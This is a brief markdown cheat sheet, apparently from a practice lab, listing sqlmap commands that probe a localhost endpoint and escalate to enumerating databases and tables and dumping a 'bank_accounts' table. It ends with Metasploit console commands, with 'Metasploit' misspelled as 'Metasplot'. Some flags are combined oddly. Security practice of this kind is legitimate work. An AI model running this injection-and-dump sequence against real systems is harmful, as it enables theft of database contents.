## sqlmap
```console
$ sqlmap -u "http://localhost:8080/user?account=admin"  
```
```console
$ sqlmap -u "http://localhost:8080/user?account=admin" --dbs  
```
```console
$ sqlmap -u "http://localhost:8080/user?account=admin" --dbs mysql -D example-db --tables  
```
```console
$ sqlmap -u "http://localhost:8080/user?account=admin" --dbs mysql -D example-db -T bank_accounts  
```
```console
$ sqlmap -u "http://localhost:8080/user?account=admin" --dbs mysql -D example-db -T bank_accounts --dump  
```
## Metasplot
```console
$ show exploits
```
```console
$ search mysql
```